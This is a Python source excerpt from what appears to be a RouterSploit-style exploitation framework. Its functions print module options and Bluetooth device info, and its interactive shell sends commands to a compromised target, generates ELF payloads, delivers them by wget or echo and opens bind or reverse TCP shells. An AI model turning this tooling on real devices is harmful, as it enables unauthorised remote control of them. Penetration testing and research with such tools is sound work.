def _show_encoders(self, *args, **kwargs):
    """List the encoders offered by the currently selected module.

    Only a module whose class derives from ``BasePayload`` is asked for its
    encoders. If the module is not a payload, or it reports no encoders, an
    error line is printed instead of a table. Extra positional and keyword
    arguments are accepted and ignored.
    """
    module = self.current_module
    is_payload = issubclass(module.__class__, BasePayload)
    available = module.get_encoders() if is_payload else None

    if not available:
        print_error("No encoders available")
        return

    columns = ("Encoder", "Name", "Description")
    print_table(columns, *available, max_column_length=100)
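def command_options(self, *args, **kwargs):
    """Print the current module's options as two tables.

    Options whose name is one of the connection-related names below are shown
    under "Target options"; everything else is shown under "Module options",
    and that second table is skipped when it would be empty. Extra positional
    and keyword arguments are accepted and ignored.
    """
    # Connection-related option names in lower- and upper-case spellings.
    # The upper-case local port entry was misspelled "LPOST", so an option
    # named "LPORT" was listed under module options rather than target options.
    target_names = (
        "lhost", "lport", "ssl", "rhost", "rport",
        "LHOST", "LPORT", "RHOST", "RPORT",
    )
    module_options = self.current_module.options
    target_opts = [opt for opt in module_options if opt in target_names]
    module_opts = [opt for opt in module_options if opt not in target_opts]
    headers = ("Name", "Current settings", "Description")

    print_info("\nTarget options:")
    print_table(headers, *self.get_opts(*target_opts))

    if module_opts:
        print_info("\nModule options:")
        print_table(headers, *self.get_opts(*module_opts))

    print_info()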
def print_info(self):
    """Print a two-column summary table for this device.

    The table heading shows the address and RSSI in blue. The rows are the
    vendor, the connectable flag (green when truthy, red otherwise) and then
    the first two fields of every entry in ``self.data``.
    """
    title = color_blue("{} ({} dBm)").format(self.addr, self.rssi)

    # Colour depends on the flag's truthiness; the text is its str() form.
    paint = color_green if self.connectable else color_red
    connectable_text = paint(str(self.connectable))

    rows = [
        ("Vendor", self.vendor),
        ("Allow Connections", connectable_text),
    ]
    rows.extend((entry[0], entry[1]) for entry in self.data)

    print_table((title, ""), *rows, max_column_length=70, extra_fill=3)
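def shell(exploit, architecture="", method="", payloads=None, **params):
    """Run the interactive ``cmd`` prompt for an exploit module.

    Args:
        exploit: module instance. Its ``execute`` method receives every input
            line that is not a built-in prompt command, and its ``target``
            attribute pre-fills ``rhost`` for ``bind_tcp`` payloads.
        architecture: name of the payload sub-directory. Payload discovery is
            skipped unless both ``architecture`` and ``method`` are non-empty.
        method: delivery method; "wget", "echo" and "cmd" are handled.
        payloads: for method "cmd", the collection of ``cmd`` values a payload
            class must match to be offered. ``None`` offers no payloads.
        **params: forwarded to ``Communication``; for method "cmd" the
            generated payload is added under the ``exec_binary`` key.

    Built-in commands are ``quit``/``exit``, ``show payloads`` and
    ``set payload <name>``. Once a payload is selected, ``show options``,
    ``set <option> <value>``, ``run`` and ``back`` are also available.
    The function returns ``None`` when the operator quits.
    """
    available_payloads = {}
    payload = None
    options = []

    if architecture and method:
        # NOTE(review): listdir() resolves this relative path against the
        # process working directory, while import_module() resolves the dotted
        # name against sys.path. The file list and the imported modules can
        # therefore disagree when the tool is started from another directory.
        # Every .py file found here is imported, i.e. its top-level code runs.
        path = "secistsploit/modules/payloads/{}/".format(architecture)

        # get all payloads for given architecture
        all_payloads = [
            f.split(".")[0] for f in listdir(path)
            if isfile(join(path, f)) and f.endswith(".py") and f != "__init__.py"
        ]

        # With the default payloads=None the membership test below used to
        # raise TypeError; treat a missing collection as "nothing allowed".
        allowed_cmds = payloads if payloads is not None else ()

        payload_path = path.replace("/", ".")
        for p in all_payloads:
            module = getattr(
                importlib.import_module("{}{}".format(payload_path, p)),
                'Payload')

            # if method/arch is cmd then filter out payloads
            # Compared with ==: the previous `is "cmd"` tested object identity,
            # which only matches when the interpreter happens to intern both
            # strings and triggers a SyntaxWarning on Python 3.8+.
            if method == "cmd":
                if getattr(module, "cmd") in allowed_cmds:
                    available_payloads[p] = module
            else:
                available_payloads[p] = module

    print_info()
    print_success(
        "Welcome to cmd. Commands are sent to the target via the execute method."
    )
    print_status(
        "For further exploitation use 'show payloads' and 'set payload <payload>' commands."
    )
    print_info()

    while True:
        # Busy-wait until the output queue is empty before showing the prompt.
        # NOTE(review): presumably another thread drains printer_queue - confirm.
        while not printer_queue.empty():
            pass

        if payload is None:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > "
        else:
            cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(
                payload._Payload__info__["name"])

        cmd = input(cmd_str)

        if cmd in ["quit", "exit"]:
            return

        elif cmd == "show payloads":
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            print_status("Available payloads:")
            headers = ("Payload", "Name", "Description")
            data = [
                (name,
                 cls._Payload__info__["name"],
                 cls._Payload__info__["description"])
                for name, cls in available_payloads.items()
            ]
            print_table(headers, *data)

        elif cmd.startswith("set payload "):
            if not available_payloads:
                print_error("There are no available payloads for this exploit")
                continue

            c = cmd.split(" ")
            if c[2] in available_payloads:
                payload = available_payloads[c[2]]()

                # Rebuild the option rows as [name, current value, description].
                options = []
                for option in payload.exploit_attributes.keys():
                    if option not in ["output", "filepath"]:
                        options.append([
                            option,
                            getattr(payload, option),
                            payload.exploit_attributes[option][1]
                        ])

                if payload.handler == "bind_tcp":
                    options.append(
                        ["rhost", exploit.target, "Target IP address"])

                    if method == "wget":
                        options.append(
                            ["lhost", "", "Connect-back IP address for wget"])
                        options.append(
                            ["lport", 4545, "Connect-back Port for wget"])
            else:
                print_error("Payload not available")

        elif payload is not None:
            if cmd == "show options":
                headers = ("Name", "Current settings", "Description")

                print_info('\nPayload Options:')
                print_table(headers, *options)
                print_info()

            elif cmd.startswith("set "):
                c = cmd.split(" ")
                if len(c) != 3:
                    print_error("set <option> <value>")
                else:
                    # Only names already listed in `options` are assigned, so
                    # the prompt cannot set arbitrary attributes on the payload.
                    for option in options:
                        if option[0] == c[1]:
                            try:
                                setattr(payload, c[1], c[2])
                            except Exception:
                                print_error("Invalid value for {}".format(
                                    c[1]))
                                break

                            option[1] = c[2]
                            print_info("{} => {}".format(c[1], c[2]))

            elif cmd == "run":
                data = payload.generate()

                if method == "wget":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options,
                                                  **params)
                    if communication.wget() is False:
                        print_error("Exploit failed to transfer payload")
                        continue

                elif method == "echo":
                    elf_binary = payload.generate_elf(data)
                    communication = Communication(exploit, elf_binary, options,
                                                  **params)
                    communication.echo()

                elif method == "cmd":
                    params["exec_binary"] = data
                    communication = Communication(exploit, "", options,
                                                  **params)

                else:
                    # Any other method left `communication` unbound, and the
                    # handler dispatch below then failed with UnboundLocalError.
                    print_error("Unsupported method '{}'".format(method))
                    continue

                if payload.handler == "bind_tcp":
                    communication.bind_tcp()
                elif payload.handler == "reverse_tcp":
                    communication.reverse_tcp()

            elif cmd == "back":
                payload = None

        else:
            print_status("Executing '{}' on the device...".format(cmd))
            print_info(exploit.execute(cmd))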
def print_services(self):
    """Print a table of the services returned by ``enumerate_services``.

    Nothing is printed when the enumeration result is empty or otherwise
    falsy.
    """
    found = self.enumerate_services()
    if not found:
        return

    columns = ("Handles", "Service > Characteristics", "Properties", "Data")
    print_table(columns, *found, max_column_length=70, extra_fill=3)